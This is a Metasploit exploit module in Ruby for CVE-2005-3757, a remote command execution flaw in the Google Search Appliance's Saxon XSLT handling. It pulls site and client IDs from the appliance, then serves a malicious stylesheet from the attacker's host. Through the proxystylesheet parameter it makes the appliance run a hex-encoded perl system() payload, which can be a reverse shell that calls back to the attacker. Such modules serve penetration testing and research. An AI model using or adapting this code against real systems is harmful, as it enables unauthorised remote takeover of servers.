Path: blob/master/modules/exploits/unix/webapp/google_proxystylesheet_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2005-3757 (OSVDB 20981, BID 15509): the Saxon XSLT
# processor behind the Google Search Appliance's "proxystylesheet" parameter
# accepted a remotely fetched stylesheet that could call arbitrary Java
# methods.  Google shipped a fix to its customers as advisory GA-2005-08-m in
# August 2005 (disclosure date 2005-08-16 below).
#
# The module mixes in both an HTTP client (to talk to the appliance) and an
# HTTP server (to serve the stylesheet), so the appliance must be able to
# reach SRVHOST:SRVPORT on the attacker-controlled host; see #exploit.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  # Module metadata.  Notable constraints: a unix command payload
  # ('cmd cmd_bash', ARCH_CMD) of at most 4000 bytes with NOPs disabled, a
  # single 'Automatic' target, and an Aggressive stance because the module
  # starts its own listener and waits for the appliance to connect back.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Google Appliance ProxyStyleSheet Command Execution',
      'Description'    => %q{
        This module exploits a feature in the Saxon XSLT parser used by
        the Google Search Appliance. This feature allows for arbitrary
        java methods to be called. Google released a patch and advisory to
        their client base in August of 2005 (GA-2005-08-m). The target appliance
        must be able to connect back to your machine for this exploit to work.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2005-3757'],
          ['OSVDB', '20981'],
          ['BID', '15509'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 4000,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2005-08-16',
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'DefaultTarget'  => 0))
  end

  # Handle incoming requests from the appliance.
  #
  # HttpServer callback, invoked when the appliance fetches the stylesheet URL
  # it was handed in #exploit.  The response is the XML template loaded in
  # #exploit with every ":x:MSF:x:" marker replaced by a perl one-liner that
  # hex-decodes the encoded command payload and hands it to system().
  #
  # @param cli [Object] the client connection the response is written to
  # @param request [Object] the incoming request; not inspected here
  def on_request_uri(cli, request)
    print_status("Handling new incoming HTTP request...")

    # payload.encoded is hex-encoded before it is embedded and decoded again by
    # perl's pack("H*") -- presumably to keep the command free of characters
    # that would need escaping inside the XML; verify against the template.
    exec_str = '/usr/bin/perl -e system(pack(qq{H*},qq{' + payload.encoded.unpack("H*")[0] + '}))'
    # @xml_data is populated by #exploit before start_service is called; this
    # callback relies on that ordering.
    data = @xml_data.gsub(/:x:MSF:x:/, exec_str)
    send_response(cli, data)
  end

  # Framework hook; this module always answers true.  How the framework uses
  # the value is not visible in this file.
  def autofilter
    true
  end

  # Vulnerability check: asks the appliance to fetch its stylesheet from a
  # random, non-existent hostname and classifies the outcome from the error
  # text the appliance returns.
  #
  # @return [Exploit::CheckCode] Appears when the body says the host "cannot be
  #   resolved to an ip address" (the appliance attempted the remote fetch);
  #   Safe in every other case -- including no response at all, so a timeout
  #   or connection failure is reported as Safe rather than Unknown.
  def check
    res = send_request_cgi({
      'uri' => '/search',
      'vars_get' =>
        {
          'client' => rand_text_alpha(rand(15)+1),
          'site' => rand_text_alpha(rand(15)+1),
          'output' => 'xml_no_dtd',
          'q' => rand_text_alpha(rand(15)+1),
          'proxystylesheet' => 'http://' + rand_text_alpha(rand(15)+1) + '/'
        }
    }, 10)   # 10 second request timeout

    if (res and res.body =~ /cannot be resolved to an ip address/)
      vprint_status("This system appears to be vulnerable")
      return Exploit::CheckCode::Appears
    end

    # The "Unable to fetch the stylesheet" message is treated as the patched
    # case; this branch only logs and then falls through to Safe below.
    if (res and res.body =~ /ERROR: Unable to fetch the stylesheet/)
      vprint_status("This system appears to be patched")
    end

    return Exploit::CheckCode::Safe
  end

  # Main entry point.  Steps: load the stylesheet template from the framework
  # data directory, learn the appliance's site and client IDs from the redirect
  # it issues for "/", start the local HTTP service, then submit a search whose
  # proxystylesheet parameter points at that service so the appliance requests
  # the document served by #on_request_uri.
  def exploit
    # load the xml data
    path = File.join(Msf::Config.data_directory, "exploits", "google_proxystylesheet.xml")
    fd = File.open(path, "rb")
    @xml_data = fd.read(fd.stat.size)   # whole template; consumed by #on_request_uri
    fd.close

    print_status("Obtaining the appliance site and client IDs...")
    # Send a HTTP/1.0 request to learn the site configuration
    res = send_request_raw({
      'uri' => '/',
      'version' => '1.0'
    }, 10)   # 10 second request timeout

    # NOTE(review): when res is nil this branch is taken, but the message
    # below then calls res.code / res.message on nil and raises NoMethodError
    # instead of printing the status line.
    if !(res and res['location'] and res['location'] =~ /site=/)
      print_status("Could not read the location header: #{res.code} #{res.message}")
      return
    end

    # site= and client= are pulled out of the Location header's query string;
    # m[1] is the site value and m[2] the client value.
    m = res['location'].match(/site=([^\&]+)\&.*client=([^\&]+)\&/im)
    if !(m and m[1] and m[2])
      print_status("Invalid location header: #{res['location']}")
      return
    end

    print_status("Starting up our web service on http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}...")
    start_service   # must be listening before the appliance is told where to fetch from

    print_status("Requesting a search using our custom XSLT...")
    res = send_request_cgi({
      'uri' => '/search',
      'vars_get' =>
        {
          'client' => m[2],
          'site' => m[1],
          'output' => 'xml_no_dtd',
          'q' => rand_text_alpha(rand(15)+1),
          'proxystylesheet' => "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}/style.xml",
          'proxyreload' => '1'
        }
    }, 25)   # 25 second timeout; the appliance presumably fetches the stylesheet while this request is pending

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print_status("Waiting on the payload to execute...")
      select(nil,nil,nil,20)   # plain 20 second sleep via select(); gives the callback time to run
    else
      print_status("No response from the server")
    end
  end
end